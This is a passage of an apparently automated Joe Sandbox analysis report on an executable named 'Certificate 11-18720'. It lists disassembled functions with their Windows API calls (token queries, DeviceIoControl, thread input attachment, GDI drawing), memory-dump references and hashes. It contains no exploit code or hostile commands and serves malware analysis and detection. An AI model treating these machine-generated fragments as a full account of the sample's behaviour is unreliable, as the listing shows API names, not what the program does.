                                                                                      • Part of subcall function 005E395C: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000001,00000000,?,?,005DF507,?,0000000E), ref: 005E399F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 614378929-0
                                                                                    • Opcode ID: 23dab1993f9768c9f0b53c4fa3f67384a08eafcab5790d63ef8fb97aa8b06cb6
                                                                                    • Instruction ID: d79f7b815152329bc19244fdc244e412cde9227fbf796f4cf78f22af65ff0fbe
                                                                                    • Opcode Fuzzy Hash: 23dab1993f9768c9f0b53c4fa3f67384a08eafcab5790d63ef8fb97aa8b06cb6
                                                                                    • Instruction Fuzzy Hash: 3811047250865BABEB263F71A80D6393F9CBF44360F205926FA8DCA151DE38CD408A90
                                                                                    Function 0060058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006005AC
                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006005C7
                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006005DD
                                                                                    • FreeLibrary.KERNEL32(?), ref: 00600632
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                    • String ID:
                                                                                    • API String ID: 3137044355-0
                                                                                    • Opcode ID: 4eb7113d189813ac688a1aff400419b6e9326389aabac579bfa20263ea46ea1a
                                                                                    • Instruction ID: cfcd3894a8cd6b0d6993df18c35820be2423e4f9f9e5a82681ef64bdf4347f78
                                                                                    • Opcode Fuzzy Hash: 4eb7113d189813ac688a1aff400419b6e9326389aabac579bfa20263ea46ea1a
                                                                                    • Instruction Fuzzy Hash: 85219A71980209EBEB258F90DC98BDBBBBAEF40700F00846DE51692190DB71EA55DF51
                                                                                    Function 00606713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00606733
                                                                                    • _memset.LIBCMT ref: 00606754
                                                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006067A6
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 006067AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1157408455-0
                                                                                    • Opcode ID: 0801978fbf20cb34786af0a72a3e9b8a9a2c7142436f25a39234cfd1efa720af
                                                                                    • Instruction ID: b830b3fb5e6d5d8b20bf2a41e2203dbd7272f9b00b255e82e7fc211935ed98f4
                                                                                    • Opcode Fuzzy Hash: 0801978fbf20cb34786af0a72a3e9b8a9a2c7142436f25a39234cfd1efa720af
                                                                                    • Instruction Fuzzy Hash: C311CA75D412287AE7205BA5AC4DFEBBABCEF45B64F10419AF504E71D0D3744F808B64
                                                                                    Function 005FB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005FAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005FAA79
                                                                                      • Part of subcall function 005FAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005FAA83
                                                                                      • Part of subcall function 005FAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005FAA92
                                                                                      • Part of subcall function 005FAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005FAA99
                                                                                      • Part of subcall function 005FAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005FAAAF
                                                                                    • GetLengthSid.ADVAPI32(?,00000000,005FADE4,?,?), ref: 005FB21B
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005FB227
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 005FB22E
                                                                                    • CopySid.ADVAPI32(?,00000000,?), ref: 005FB247
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                    • String ID:
                                                                                    • API String ID: 4217664535-0
                                                                                    • Opcode ID: 68ebddb9aad6f9232e171489c65b4b59263dbdf15725baf7ff632be40793937e
                                                                                    • Instruction ID: e9ff7e569da4647baef2682ac7c4b589b0d00edd033cc021d19c47e5838cc2b8
                                                                                    • Opcode Fuzzy Hash: 68ebddb9aad6f9232e171489c65b4b59263dbdf15725baf7ff632be40793937e
                                                                                    • Instruction Fuzzy Hash: 98119479A00209EFDB149F54DC95ABEBBAAFF85304F14942DEA4297211D7359E44CB10
                                                                                    Function 005FB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 005FB498
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005FB4AA
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005FB4C0
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005FB4DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: e8f01d7c3bde479ee4a1701f30bd230885986f963cea3486619af16e0fe8fbb8
                                                                                    • Instruction ID: d5910075b7cfe1beb28276f0aabd70ea460a530edd42b9ac9e95cfead5dab68f
                                                                                    • Opcode Fuzzy Hash: e8f01d7c3bde479ee4a1701f30bd230885986f963cea3486619af16e0fe8fbb8
                                                                                    • Instruction Fuzzy Hash: 14115A7A900218FFEF11DFA8C985EADBBB5FB08700F204091E604B7290D771AE10DB94
                                                                                    Function 005DB55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 005DB5A5
                                                                                    • GetClientRect.USER32(?,?), ref: 0063E69A
                                                                                    • GetCursorPos.USER32(?), ref: 0063E6A4
                                                                                    • ScreenToClient.USER32(?,?), ref: 0063E6AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4127811313-0
                                                                                    • Opcode ID: 2ccc299e53f19b8d271d9dc420ce9de5384c27012156951963cbcf0317fbfd01
                                                                                    • Instruction ID: a48897dbe56b5fd1d14a02d319afa5bf28ff017590286f9c72bffff16ac37fd1
                                                                                    • Opcode Fuzzy Hash: 2ccc299e53f19b8d271d9dc420ce9de5384c27012156951963cbcf0317fbfd01
                                                                                    • Instruction Fuzzy Hash: A7113A3590002AFBDF10DF58D84A8EE7BBAFB4A304F010456F941E7240E730AA91CBA1
                                                                                    Function 0060732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00607352
                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00607385
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0060739B
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006073A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 2880819207-0
                                                                                    • Opcode ID: 4b7051e1ac0b0852681b3c8bbfd115c327294fc4dbebc9f3a1b4b892bd4c1925
                                                                                    • Instruction ID: 20d1efcce1fff7fb47449851932a8e0dcf29cb87746821f1cc74ddda6be111cf
                                                                                    • Opcode Fuzzy Hash: 4b7051e1ac0b0852681b3c8bbfd115c327294fc4dbebc9f3a1b4b892bd4c1925
                                                                                    • Instruction Fuzzy Hash: 28110476E04214BFD71A9FA8DC09ADF7BAFAB46350F044355F921D33A1D6B09E0087A0
                                                                                    Function 005DD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005DD1BA
                                                                                    • GetStockObject.GDI32(00000011), ref: 005DD1CE
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 005DD1D8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3970641297-0
                                                                                    • Opcode ID: 2f8223531709120502c21e67095559f9d52a3adf0826df0cd9e97e7f4879d1a7
                                                                                    • Instruction ID: 7b2b46db99b9c7d767e1560908a917054746753d76da9e6cd6afe9fd1743dd50
                                                                                    • Opcode Fuzzy Hash: 2f8223531709120502c21e67095559f9d52a3adf0826df0cd9e97e7f4879d1a7
                                                                                    • Instruction Fuzzy Hash: 60118BB2501509BFEB224FA49C50EEABF7AFF0A3A4F040107FA1452250C7329C60DBA0
                                                                                    Function 005F4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                    • String ID:
                                                                                    • API String ID: 3016257755-0
                                                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                    • Instruction ID: c633fb8418c27327f26d95f17fc2621db0b2b00dd5057592c970f26712935a98
                                                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                    • Instruction Fuzzy Hash: A8014C3604014EBBCF125E88DC058EE3F6BBB58350B588855FF2859031D33ACAB1AF82
                                                                                    Function 005E7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005E7A0D: __getptd_noexit.LIBCMT ref: 005E7A0E
                                                                                    • __lock.LIBCMT ref: 005E748F
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 005E74AC
                                                                                    • _free.LIBCMT ref: 005E74BF
                                                                                    • InterlockedIncrement.KERNEL32(00F151A8), ref: 005E74D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                    • String ID:
                                                                                    • API String ID: 2704283638-0
                                                                                    • Opcode ID: 73f9eb2e17057cee9a207e1769063418a2052c739f7f65706239c5a8e59f5a5f
                                                                                    • Instruction ID: 9aaceb76a08a62a587d11dc37eeb5854f3fbf855ba152d5326194a99d5fe62bd
                                                                                    • Opcode Fuzzy Hash: 73f9eb2e17057cee9a207e1769063418a2052c739f7f65706239c5a8e59f5a5f
                                                                                    • Instruction Fuzzy Hash: 0B010432905B6A97DB1EAF66950971DBF60BF88720F144005F498A76C0CB305940CFC2
                                                                                    Function 0062EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 005DAFE3
                                                                                      • Part of subcall function 005DAF83: SelectObject.GDI32(?,00000000), ref: 005DAFF2
                                                                                      • Part of subcall function 005DAF83: BeginPath.GDI32(?), ref: 005DB009
                                                                                      • Part of subcall function 005DAF83: SelectObject.GDI32(?,00000000), ref: 005DB033
                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0062EA8E
                                                                                    • LineTo.GDI32(00000000,?,?), ref: 0062EA9B
                                                                                    • EndPath.GDI32(00000000), ref: 0062EAAB
                                                                                    • StrokePath.GDI32(00000000), ref: 0062EAB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                    • String ID:
                                                                                    • API String ID: 1539411459-0
                                                                                    • Opcode ID: eef0183d5505eeea99b2f0dae79194a7efdafbbd60632faad3ca774c2fe35c7a
                                                                                    • Instruction ID: edb928eb9d829fe3a7a438083d59ac98389edf91b1d51617ddb7823cfe8ff25c
                                                                                    • Opcode Fuzzy Hash: eef0183d5505eeea99b2f0dae79194a7efdafbbd60632faad3ca774c2fe35c7a
                                                                                    • Instruction Fuzzy Hash: 2EF0E235401269BBDB129FA4AC0EFCE3F1BAF07710F144202FE01661E183B55652CB99
                                                                                    Function 005FC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 005FC84A
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 005FC85D
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005FC864
                                                                                    • AttachThreadInput.USER32(00000000), ref: 005FC86B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2710830443-0
                                                                                    • Opcode ID: fc607de9da3a6121605a4b7347416872df898071ecf98cb4dec70927ffcec2be
                                                                                    • Instruction ID: ff0d1880e74d0bcf2eef4e2a84865a1804b8965b2e9c9c525c8f5c5155e49280
                                                                                    • Opcode Fuzzy Hash: fc607de9da3a6121605a4b7347416872df898071ecf98cb4dec70927ffcec2be
                                                                                    • Instruction Fuzzy Hash: 82E06D7594122CBADB201BA2DC1DEEB7F1DEF067A1F008421BA0D95460C7B5C580CBE0
                                                                                    Function 005FB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThread.KERNEL32 ref: 005FB0D6
                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,005FAC9D), ref: 005FB0DD
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005FAC9D), ref: 005FB0EA
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,005FAC9D), ref: 005FB0F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                    • String ID:
                                                                                    • API String ID: 3974789173-0
                                                                                    • Opcode ID: b2eb54c8c248777ff1a5e028bdd48cc7dede4f75ec47060e2a7be8fda7b67a75
                                                                                    • Instruction ID: d365e8fe76b503f936f5aa6609a682ad7fc35e3ae52106963a16c61f754650aa
                                                                                    • Opcode Fuzzy Hash: b2eb54c8c248777ff1a5e028bdd48cc7dede4f75ec47060e2a7be8fda7b67a75
                                                                                    • Instruction Fuzzy Hash: F0E04F36B01211DBE7201FB19C0CB573BAEEF56B95F018818A641D6040DA3884018760
                                                                                    Function 005DB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 005DB496
                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 005DB4A0
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 005DB4B5
                                                                                    • GetStockObject.GDI32(00000005), ref: 005DB4BD
                                                                                    • GetWindowDC.USER32(?,00000000), ref: 0063DE2B
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0063DE38
                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0063DE51
                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0063DE6A
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0063DE8A
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0063DE95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1946975507-0
                                                                                    • Opcode ID: 66140c2ab6e5dd2b67e8d500098a825fab761644947a48ecf8620f2dfb2badb8
                                                                                    • Instruction ID: 2dbe0ace71b304e7bc71dc6a74295e6149cb4a11b2b61c349132a189bd7acc02
                                                                                    • Opcode Fuzzy Hash: 66140c2ab6e5dd2b67e8d500098a825fab761644947a48ecf8620f2dfb2badb8
                                                                                    • Instruction Fuzzy Hash: ABE0ED35500280AAEF215B68BC09BD87F13AB57339F14D666FAAA580E2C7714581DB11
                                                                                    Function 005FB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005FB2DF
                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 005FB2EB
                                                                                    • CloseHandle.KERNEL32(?), ref: 005FB2F4
                                                                                    • CloseHandle.KERNEL32(?), ref: 005FB2FC
                                                                                      • Part of subcall function 005FAB24: GetProcessHeap.KERNEL32(00000000,?,005FA848), ref: 005FAB2B
                                                                                      • Part of subcall function 005FAB24: HeapFree.KERNEL32(00000000), ref: 005FAB32
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
